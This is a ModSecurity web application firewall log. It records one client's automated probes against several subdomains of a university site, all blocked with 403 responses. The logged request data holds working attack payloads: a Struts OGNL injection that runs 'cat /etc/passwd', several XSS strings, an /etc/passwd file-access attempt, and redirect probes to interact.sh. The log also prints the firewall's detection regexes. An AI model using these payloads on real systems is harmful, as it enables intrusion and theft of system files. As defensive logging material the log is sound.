[Tue Aug 29 11:49:16.382137 2023] [:error] [pid 2446] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/eam/vib"] [unique_id "ZO14zMCo-f0AAAmOBaAAAAAU"]
[Tue Aug 29 11:51:05.184843 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:settingsform[newpassword1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: ' onclick= found within ARGS:settingsform[newpassword1]: pdteam' onclick='alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/install.php"] [unique_id "ZO15OcCo-f0AAAlIBdkAAAAn"]
[Tue Aug 29 11:51:05.187925 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/cliniccases/lib/php/data/messages_load.php"] [unique_id "ZO15OcCo-f0AAAknELMAAAAB"]
[Tue Aug 29 11:51:05.189638 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:settingsform[newpassword1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:settingsform[newpassword1]: pdteam' onclick='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15OcCo-f0AAAfWOAsAAAAL"]
[Tue Aug 29 11:51:05.248201 2023] [:error] [pid 2424] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expression. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22) ,# found within ARGS:expression: (#_memberAccess[\\x22allowStaticMethodAccess\\x22]=true,#foo=new java.lang.Boolean(\\x22false\\x22) ,#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat /etc/passwd').getInputStream()))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/devmode.action"] [unique_id "ZO15OcCo-f0AAAl4sWQAAAAf"]
[Tue Aug 29 11:51:05.254798 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/exchweb/bin/redir.asp"] [unique_id "ZO15OcCo-f0AAAknELUAAAAB"]
[Tue Aug 29 11:51:05.277535 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onerror= found within ARGS:username: <img/src/onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/cas/v1/tickets/"] [unique_id "ZO15OcCo-f0AAAknELYAAAAB"]
[Tue Aug 29 11:51:05.330446 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:settingsform[newpassword1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: ' onclick= found within ARGS:settingsform[newpassword1]: pdteam' onclick='alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15OcCo-f0AAAfWOA4AAAAL"]
[Tue Aug 29 11:51:05.334525 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/cliniccases/lib/php/data/messages_load.php"] [unique_id "ZO15OcCo-f0AAAlIBdwAAAAn"]
[Tue Aug 29 11:51:05.340312 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:settingsform[newpassword1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: ' onclick= found within ARGS:settingsform[newpassword1]: pdteam' onclick='alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15OcCo-f0AAAknELcAAAAB"]
[Tue Aug 29 11:51:05.354492 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/cliniccases/lib/php/data/messages_load.php"] [unique_id "ZO15OcCo-f0AAAlIBd0AAAAn"]
[Tue Aug 29 11:51:05.355563 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:settingsform[newpassword1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:settingsform[newpassword1]: pdteam' onclick='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15OcCo-f0AAAhoHN4AAAAl"]
[Tue Aug 29 11:51:05.367901 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cliniccases/lib/php/data/messages_load.php"] [unique_id "ZO15OcCo-f0AAAfWOBAAAAAL"]
[Tue Aug 29 11:51:05.416903 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/exchweb/bin/redir.asp"] [unique_id "ZO15OcCo-f0AAAhoHOEAAAAl"]
[Tue Aug 29 11:51:05.432962 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/exchweb/bin/redir.asp"] [unique_id "ZO15OcCo-f0AAAlIBeEAAAAn"]
[Tue Aug 29 11:51:05.434742 2023] [:error] [pid 2424] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expression. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22) ,# found within ARGS:expression: (#_memberAccess[\\x22allowStaticMethodAccess\\x22]=true,#foo=new java.lang.Boolean(\\x22false\\x22) ,#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat /etc/passwd').getInputStream()))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/devmode.action"] [unique_id "ZO15OcCo-f0AAAl4sWsAAAAf"]
[Tue Aug 29 11:51:05.486914 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/cliniccases/lib/php/data/messages_load.php"] [unique_id "ZO15OcCo-f0AAAfWOBUAAAAL"]
[Tue Aug 29 11:51:05.507162 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/exchweb/bin/redir.asp"] [unique_id "ZO15OcCo-f0AAAfWOBYAAAAL"]
[Tue Aug 29 11:51:05.522081 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expression. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22) ,# found within ARGS:expression: (#_memberAccess[\\x22allowStaticMethodAccess\\x22]=true,#foo=new java.lang.Boolean(\\x22false\\x22) ,#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat /etc/passwd').getInputStream()))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/devmode.action"] [unique_id "ZO15OcCo-f0AAAknEL8AAAAB"]
[Tue Aug 29 11:51:05.604684 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expression. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22) ,# found within ARGS:expression: (#_memberAccess[\\x22allowStaticMethodAccess\\x22]=true,#foo=new java.lang.Boolean(\\x22false\\x22) ,#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat /etc/passwd').getInputStream()))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/devmode.action"] [unique_id "ZO15OcCo-f0AAAknEMIAAAAB"]
[Tue Aug 29 11:51:05.652145 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expression. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22) ,# found within ARGS:expression: (#_memberAccess[\\x22allowStaticMethodAccess\\x22]=true,#foo=new java.lang.Boolean(\\x22false\\x22) ,#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat /etc/passwd').getInputStream()))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/devmode.action"] [unique_id "ZO15OcCo-f0AAAfWOBoAAAAL"]
[Tue Aug 29 11:51:05.755191 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onerror= found within ARGS:username: <img/src/onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/cas/v1/tickets/"] [unique_id "ZO15OcCo-f0AAAlIBewAAAAn"]
[Tue Aug 29 11:51:05.762621 2023] [:error] [pid 2489] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:username: <img/src/onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/cas/v1/tickets/"] [unique_id "ZO15OcCo-f0AAAm5BuMAAAAA"]
[Tue Aug 29 11:51:05.778333 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onerror= found within ARGS:username: <img/src/onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/cas/v1/tickets/"] [unique_id "ZO15OcCo-f0AAAlIBe0AAAAn"]
[Tue Aug 29 11:51:05.903242 2023] [:error] [pid 2489] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:username: <img/src/onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cas/v1/tickets/"] [unique_id "ZO15OcCo-f0AAAm5BukAAAAA"]
[Tue Aug 29 11:51:05.936513 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/exchweb/bin/redir.asp"] [unique_id "ZO15OcCo-f0AAAlIBfQAAAAn"]
[Tue Aug 29 11:51:06.017215 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/cliniccases/lib/php/data/messages_load.php"] [unique_id "ZO15OsCo-f0AAAlIBfcAAAAn"]
[Tue Aug 29 11:51:06.258412 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO15OsCo-f0AAAlIBgEAAAAn"]
